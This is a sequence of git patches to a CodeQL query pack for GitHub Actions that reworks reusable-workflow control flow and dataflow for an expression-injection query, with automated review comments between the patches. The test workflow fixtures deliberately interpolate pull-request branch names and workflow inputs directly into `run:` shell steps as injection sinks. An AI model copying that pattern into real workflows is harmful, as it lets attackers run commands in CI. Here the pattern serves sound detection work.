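Review bot: `scopeFirst` still enters a reusable-workflow scope at `getInputs()` only, while the new `ReusableWorkflowTree` in the next hunk of this file (L475) ranks `getInputs()` and `getOutputs()` as children by source location. A workflow declaring `outputs` but no `inputs` therefore gets no entry node, and if `outputs:` precedes `inputs:` in the YAML the entry disagrees with the tree order. Mirroring the job case, `first(scope.(ReusableWorkflowStmt), e) or first(scope.(JobStmt), e)`, lets the tree decide, assuming `first` accepts the workflow node as it does the job.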
@@ -148,14 +148,39 @@ private import Completion private import CfgScope private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { - override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getInputs() or child = super.getOutputs()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getInputExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } -private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getParamExpr(_) and l = child.getLocation() + child = super.getOutputExpr(_) and l = child.getLocation() | child order by @@ -164,7 +189,7 @@ private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof } } -private class ParamExprTree extends LeafTree instanceof ParamExpr { } +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b2ab51e28fa8..3e6a6141767c 100644 
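Review bot: `ReusableWorkflowTree` now orders a workflow's `inputs` and `outputs` mappings purely by source location, so the CFG order between them depends on the YAML key order rather than on their meaning; nothing in the hunk says that is intended, and `scopeFirst` in the previous hunk of this file (L474) still assumes inputs come first. A comment on the class would stop the next reader from "fixing" it: `// Children (inputs, outputs) are visited in source order; the entry chosen by scopeFirst must agree with this ranking`. The same `order by` clause now appears five times in this file; see the note on the earlier Cfg.qll hunk (L462).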
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -127,7 +127,7 @@ private class EventSource extends RemoteFlowSource { private class ChangedFilesSource extends RemoteFlowSource { ChangedFilesSource() { exists(UsesExpr uses | - uses.getTarget() = "tj-actions/changed-files" and + uses.getCallee() = "tj-actions/changed-files" and uses.getVersion() = ["v10", "v20", "v30", "v40"] and uses = this.asExpr() ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 223ff305ba43..ead312d8af6b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -26,7 +26,7 @@ class AdditionalTaintStep extends Unit { private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | - u.getTarget() = "mad9000/actions-find-and-replace-string" and + u.getCallee() = "mad9000/actions-find-and-replace-string" and pred.asExpr() = u.getArgument(["source", "replace"]) and succ.asExpr() = u ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 1e6fbd5b8544..02b7de847e3e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -6,38 +6,7 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = - TExprNode(DataFlowExpr e) or - TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or - TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } - -/** - * Reusable workflow input nodes - */ -class ParameterNode extends Node, TParameterNode { - private ParamExpr parameter; - - ParameterNode() { this = TParameterNode(parameter) } - - predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) - } - - override string toString() { result = parameter.toString() } - - override Location getLocation() { result = parameter.getLocation() } - - ParamExpr getParameter() { result = parameter } -} - -/** - * Reusable workflow output nodes - */ -class ReturnNode extends Node { - ReturnNode() { none() } - - ReturnKind getKind() { none() } -} +newtype TNode = TExprNode(DataFlowExpr e) class OutNode extends ExprNode { private DataFlowCall call; @@ -76,6 +45,8 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) + // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) + // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } 
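Review bot: The two commented-out alternatives added to `nodeGetEnclosingCallable` refer to `TReturningNode` and `TParameterNode`, which the first hunk of this file removes from `TNode`, so they can never be uncommented as written. Since `ParameterNode` and `ReturnNode` now extend `ExprNode` (DataFlowPublic.qll hunks, L480–L481), the single `TExprNode` case already gives them an enclosing callable; replace the dead lines with `// ParameterNode and ReturnNode are ExprNodes, so the TExprNode case covers them` or drop them.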
@@ -97,21 +68,27 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + string getName() { result = super.getAstNode().(UsesExpr).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } /** * A Cfg scope that can be called - * ReusableWorkflowStmt */ -class DataFlowCallable instanceof ReusableWorkflowStmt { +class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getName() } + string getName() { + if this instanceof ReusableWorkflowStmt + then result = this.(ReusableWorkflowStmt).getName() + else + if this instanceof JobStmt + then result = this.(JobStmt).getId() + else none() + } } newtype TReturnKind = TNormalReturn() @@ -188,7 +165,7 @@ ContentApprox getContentApprox(Content c) { none() } * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } } /** 
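Review bot: `getName()` is written as a nested `if … then … else if … then … else none()` where `else none()` only restates that no other scope has a name; the disjunction `result = this.(ReusableWorkflowStmt).getName() or result = this.(JobStmt).getId()` is equivalent and shorter. With `DataFlowCallable` widened back to every `Cfg::CfgScope`, job scopes become callables whose name is a job id that no `DataFlowCall.getName()` (an `owner/repo` or workflow-path string) can match, so, assuming `viableCallable` is unchanged from L464, they exist only so that `nodeGetEnclosingCallable` is total; a one-line comment, `// Job scopes are callables without callers; only reusable workflows are resolved by viableCallable`, would save the next reader a search.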
@@ -231,20 +208,25 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression + exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getInputExpr() = astFrom + ) +} + /** * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. * For Actions, we dont need SSA nodes since it should be already in SSA form * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) -} +predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } /** - * a simple local flow step + * a simple local flow step that should always preserve the call context (same callable) */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } @@ -252,8 +234,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global * variable. + * We throw away the call context and let us jump to any location + * AKA teleport steps + * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node node1, Node node2) { none() } +predicate jumpStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, 
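Review bot: Moving `stepUsesOutputDefToUse`, `runOutputDefToUse`, `jobOutputDefToUse` and the new `reusableWorkflowInputDefToUse` from `localFlowStep` (now `none()`) to `jumpStep` discards call context on every step, so flow that enters a reusable workflow from one caller's `with:` argument can leave through another caller's `needs.<job>.outputs` read; findings through reusable workflows become context-insensitive, which the "teleport steps" wording hints at but does not spell out. The doc on `jumpStep` still names `node1`/`node2` while the parameters are now `nodeFrom`/`nodeTo`, and "preferible" should be "preferable"; suggested wording for the added lines: `* These steps discard the call context (jump steps), so a value can exit a reusable workflow into any caller. Local steps are preferable because they stay context-sensitive.`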
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 41be90718d85..80f504963b9b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -44,6 +44,28 @@ class ExprNode extends Node, TExprNode { override AstNode asExpr() { result = expr.getAstNode() } } +/** + * Reusable workflow input nodes + */ +class ParameterNode extends ExprNode { + private InputExpr parameter; + + ParameterNode() { + this.asExpr() = parameter and + parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + InputExpr getInputExpr() { result = parameter } +} + /** * An argument to a Uses step (call) */ 
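Review bot: `ParameterNode` now extends `ExprNode` and is selected by `parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_)`, where `InputExpr` (Ast.qll hunk, L470) is the key string under `on.workflow_call.inputs`, so the parameter node is the input's declaration key rather than any value; the two-word doc "Reusable workflow input nodes" does not say that. Suggested: `/** The declaration key of an input under `on.workflow_call.inputs`, acting as the parameter node of the enclosing reusable workflow; its position is the input name. */`. `isParameterOf` restricts to `c.(ReusableWorkflowStmt).getInputs()`, so the unbound `w` in the constructor is harmless.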
@@ -51,12 +73,30 @@ class ArgumentNode extends ExprNode { ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { - this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and + this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } +/** + * Reusable workflow output nodes + */ +class ReturnNode extends ExprNode { + private Cfg::Node node; + + ReturnNode() { + this.getCfgNode() = node and + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + } + + ReturnKind getKind() { result = TNormalReturn() } + + override string toString() { result = "return " + node.toString() } + + override Location getLocation() { result = node.getLocation() } +} + /** Gets the node corresponding to `e`. */ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml index 3b0ab8f18d32..9aafe1189efa 100644 --- a/ql/lib/test/.github/workflows/calling_workflow.yml +++ b/ql/lib/test/.github/workflows/calling_workflow.yml 
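Review bot: In `argumentOf`, the conjunct `this.getCfgNode() = call.(Cfg::Node).getASuccessor+()` is a transitive closure over the entire CFG, while the second conjunct already pins the node to the call's own `getArgument(pos)` AST child; if the reachability is only meant to keep call and argument in the same scope, a scope equality would be cheaper and the closure could go, and if it is load-bearing a comment should say why. Flipping predecessor to successor is consistent with the pre-order trees in Cfg.qll, where a call node precedes its arguments. `ReturnNode.toString()` prefixes `"return "` while `ParameterNode.toString()` in the previous hunk adds no marker; a matching `"parameter "` prefix would make debug output symmetric.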
@@ -1,18 +1,38 @@ -on: push +name: Call a reusable workflow and use its outputs + +on: + workflow_dispatch: jobs: - call-workflow-1-in-local-repo: + call1: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-2-in-local-repo: + call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-in-another-repo: + call3: uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit + + job1: + runs-on: ubuntu-latest + needs: call1 + steps: + - run: echo ${{ needs.call1.outputs.workflow-output }} + job2: + runs-on: ubuntu-latest + needs: call2 + steps: + - run: echo ${{ needs.call2.outputs.workflow-output1 }} + - run: echo ${{ needs.call2.outputs.workflow-output2 }} + job3: + runs-on: ubuntu-latest + needs: call3 + steps: + - run: echo ${{ needs.call3.outputs.workflow-output }} diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml index f31c8a63d740..45c177edecb6 100644 --- a/ql/lib/test/.github/workflows/reusable_workflow.yml +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml 
@@ -6,13 +6,28 @@ on: config-path: required: true type: string + outputs: + workflow-output1: + value: ${{ jobs.job1.outputs.job-output1 }} + workflow-output2: + value: ${{ jobs.job1.outputs.job-output2 }} secrets: token: required: true jobs: - triage: + job1: runs-on: ubuntu-latest + outputs: + job-output1: ${{ steps.step1.outputs.step-output}} + job-output2: ${{ steps.step2.outputs.all_changed_files}} steps: - - id: sink - run: echo ${{ inputs.config-path }} + - id: step1 + env: + CONFIG_PATH: ${{ inputs.config-path }} + run: | + echo ${{ inputs.config-path }} + echo "::set-output name=step-output:: $CONFIG_PATH" + - name: Get changed files + id: step2 + uses: tj-actions/changed-files@v40 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 31bcdc256d8a..8d558cbaacdb 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -48,7 +48,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof JobUsesExpr + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -66,3 +66,5 @@ query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } + +query predicate scopes(Cfg::CfgScope c) { any() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4af1e2c286a6..2fe6f17dfb61 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql 
@@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + //predicate isSink(DataFlow::Node sink) { any() } //predicate neverSkip(DataFlow::Node node) { any() } } diff --git a/ql/src/test/partial.ql b/ql/src/test/partial.ql new file mode 100644 index 000000000000..779749f82f66 --- /dev/null +++ b/ql/src/test/partial.ql @@ -0,0 +1,33 @@ +/** + * @name Forward Partial Dataflow + * @description Forward Partial Dataflow + * @kind path-problem + * @precision low + * @problem.severity error + * @id actions/test-dataflow + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import PartialFlow::PartialPathGraph + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + } + + predicate isSink(DataFlow::Node sink) { none() } +} + +private module MyFlow = TaintTracking::Global; // or DataFlow::Global<..> + +int explorationLimit() { result = 10 } + +private module PartialFlow = MyFlow::FlowExplorationFwd; + +from PartialFlow::PartialPathNode source, PartialFlow::PartialPathNode sink +where PartialFlow::partialFlow(source, sink, _) +select sink.getNode(), source, sink, "This node receives taint from $@.", source.getNode(), + "this source" From 9c6fd20e5e6a9b96423c1f3b0cabaf722ff0908f Mon Sep 17 00:00:00 2001 
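Review bot: A second commented-out `isSink` (`//predicate isSink(DataFlow::Node sink) { any() }`) now sits next to `//predicate neverSkip(...)` in the shipped security query's configuration; these debugging toggles belong in a scratch query rather than in `ExpressionInjection.ql`, since the next person to uncomment one silently turns every node into a sink. Remove both lines or move them to `ql/src/test/partial.ql`, which this commit adds for that purpose. `MyConfig` continues outside the hunk.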
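Review bot: `partial.ql` is a path-problem query with `@id actions/test-dataflow` and `isSource` hard-wired to the file `calling_workflow.yml`, placed under `ql/src/test/` inside the query pack shown in the diffstat; depending on how the pack's suites select queries it can be picked up next to the real security queries, and its forward partial flow with `explorationLimit()` of 10 is an interactive debugging aid. A tag the suites exclude, or a separate test/debug pack, keeps it out of published results; at minimum the header should say `@description Debug query: forward partial dataflow from sources in calling_workflow.yml`. `isSink` is `none()` by design here, so the query never reports complete paths.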
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 12:29:48 +0100 Subject: [PATCH 016/707] Move reusable tests to src pack --- ql/{lib => src}/test/.github/workflows/calling_workflow.yml | 0 ql/{lib => src}/test/.github/workflows/reusable_workflow.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename ql/{lib => src}/test/.github/workflows/calling_workflow.yml (100%) rename ql/{lib => src}/test/.github/workflows/reusable_workflow.yml (100%) diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/calling_workflow.yml rename to ql/src/test/.github/workflows/calling_workflow.yml diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/src/test/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/reusable_workflow.yml rename to ql/src/test/.github/workflows/reusable_workflow.yml From b54316fc9ab101bcb6a2e11ac57a888c681cc477 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 13:35:47 +0100 Subject: [PATCH 017/707] Refactor CfgScopes and Ast predicate names --- ql/lib/codeql/actions/Ast.qll | 53 +++++++------- .../actions/controlflow/internal/Cfg.qll | 70 +++++++++++-------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 45 ++++-------- .../dataflow/internal/DataFlowPublic.qll | 18 ++--- .../Security/CWE-094/ExpressionInjection.ql | 2 - 6 files changed, 94 insertions(+), 96 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b84f884c034f..a25ef856233b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -31,11 +31,9 @@ class Expression extends Statement { } * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { - JobStmt getAJob() { result = super.getJob(_) } + JobStmt getAJobStmt() { result = super.getJob(_) } - JobStmt getJob(string id) { result = super.getJob(id) } - - predicate isReusable() { this instanceof ReusableWorkflowStmt } + JobStmt getJobStmt(string id) { result = super.getJob(id) } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -45,15 +43,19 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + ReusableWorkflowInputsStmt getInputsStmt() { + result = workflow_call.(YamlMapping).lookup("inputs") + } - OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + ReusableWorkflowOutputsStmt getOutputsStmt() { + result = workflow_call.(YamlMapping).lookup("outputs") + } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class InputsStmt extends Statement instanceof YamlMapping { - InputsStmt() { +class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowInputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } 
@@ -70,16 +72,16 @@ class InputsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - InputExpr getInputExpr(string name) { + ReusableWorkflowInputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class InputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } -class OutputsStmt extends Statement instanceof YamlMapping { - OutputsStmt() { +class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowOutputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) } @@ -96,12 +98,12 @@ class OutputsStmt extends Statement instanceof YamlMapping { * description: "The second output string" * value: ${{ jobs.example_job.outputs.output2 }} */ - OutputExpr getOutputExpr(string name) { + ReusableWorkflowOutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class OutputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -114,10 +116,10 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStep(int index) { result = super.getStep(index) } + StepStmt getStepStmt(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStep() { result = super.getStep(_) } + StepStmt getAStepStmt() { result = super.getStep(_) } /** * Gets a needed job. 
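Review bot: `getName()` returns `getRelativePath()` (a path such as `.github/workflows/x.yml`) and that value is what `viableCallable` later compares against the caller's name (`c.getName() = result.getName()`), so call resolution depends on `JobUsesExpr.getCallee()` producing exactly that form. Local reusable-workflow references are written `./.github/workflows/x.yml` and remote ones `owner/repo/.github/workflows/x.yml@ref`; unless `getCallee()` normalises the `./` prefix and strips `@ref` (not visible here), `with:` arguments will never flow into the callee's inputs and attacker-controlled values passed to a reusable workflow are silently lost. Please document the expected form on `getName()`, e.g. `/** Gets the repository-relative path of this workflow file; `JobUsesExpr.getCallee()` must yield the same form for call resolution. */`, and add a fixture where a `./`-prefixed `uses:` resolves. `ReusableWorkflowStmt` begins before this hunk.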
@@ -147,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJob() = this } + JobUsesExpr getUsesExpr() { result.getJobStmt() = this } } /** @@ -178,7 +180,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping { class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJob() { result = super.getJob() } + JobStmt getJobStmt() { result = super.getJob() } } /** @@ -189,7 +191,7 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); - abstract Expression getArgument(string key); + abstract Expression getArgumentExpr(string key); } /** @@ -204,7 +206,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getVersion() { result = uses.getVersion() } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) @@ -220,7 +222,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJob() { result = this } + JobStmt getJobStmt() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -255,7 +257,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -290,8 +292,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } - JobStmt getJob() { result.getAChildNode*() = this } - //override string toString() { result = expr } + JobStmt getJobStmt() { result.getAChildNode*() = this } } /** 
@@ -313,7 +314,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { string getVarName() { result = varName } - StepStmt getStep() { result.getId() = stepId } + StepStmt getStepStmt() { result.getId() = stepId } } /** @@ -368,7 +369,7 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { Expression getInputExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputs().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 057d7872ee3b..9129ee5dc617 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,7 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - - class JobScope extends CfgScope instanceof JobStmt { } + class WorkflowScope extends CfgScope instanceof WorkflowStmt { } } private module Implementation implements CfgShared::InputSig { @@ -122,15 +120,9 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getInputs(), e) or - first(scope.(JobStmt), e) - } + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(ReusableWorkflowStmt), e, c) or - last(scope.(JobStmt), e, c) - } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } 
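Review bot: `getStepStmt()` still resolves `steps.<id>.outputs.*` by id alone, `StepStmt getStepStmt() { result.getId() = stepId }`, so it returns every step with that id in every job and workflow in the database; step ids are only unique within a job. The def-to-use steps in `DataFlowPrivate.qll` guard this with `uses.getJobStmt() = outputRead.getJobStmt()`, but any other caller of `getStepStmt()` gets cross-job and cross-workflow matches, which turns one tainted `id: changes` step into alerts in unrelated workflows. Scope it here so the guard is not needed at each call site: `StepStmt getStepStmt() { result.getId() = stepId and result.getJobStmt() = this.getJobStmt() }`. `StepOutputAccessExpr` begins before this hunk.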
@@ -147,21 +139,38 @@ private import CfgImpl private import Completion private import CfgScope -private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getInputs() or child = super.getOutputs()) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) + if this instanceof ReusableWorkflowStmt + then + result = + rank[i](Expression child, Location l | + ( + child = this.(ReusableWorkflowStmt).getInputsStmt() or + child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getAJobStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + else + result = + rank[i](Expression child, Location l | + child = super.getAJobStmt() and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | 
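Review bot: The two branches of the new `if this instanceof ReusableWorkflowStmt` in `WorkflowTree.getChildNode` differ only in two extra disjuncts, and everything else (the `rank`, the `order by` key list) is duplicated, which is the kind of copy that drifts when the ordering key is next changed. Because a `.(ReusableWorkflowStmt)` cast is simply empty for an ordinary workflow, a single `rank` over the union of all three child kinds gives the same result for both cases. The rewrite below also documents why that is safe; the CFG `first`/`last` machinery this feeds is outside the hunk, so the pre-order position of inputs/outputs relative to jobs is unchanged by this restyle.
```ql
private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt {
  override ControlFlowTree getChildNode(int i) {
    // The ReusableWorkflowStmt casts are empty for plain workflows, so one rank
    // covers both reusable and non-reusable workflows without duplicating the order key.
    result =
      rank[i](Expression child, Location l |
        (
          child = super.getAJobStmt() or
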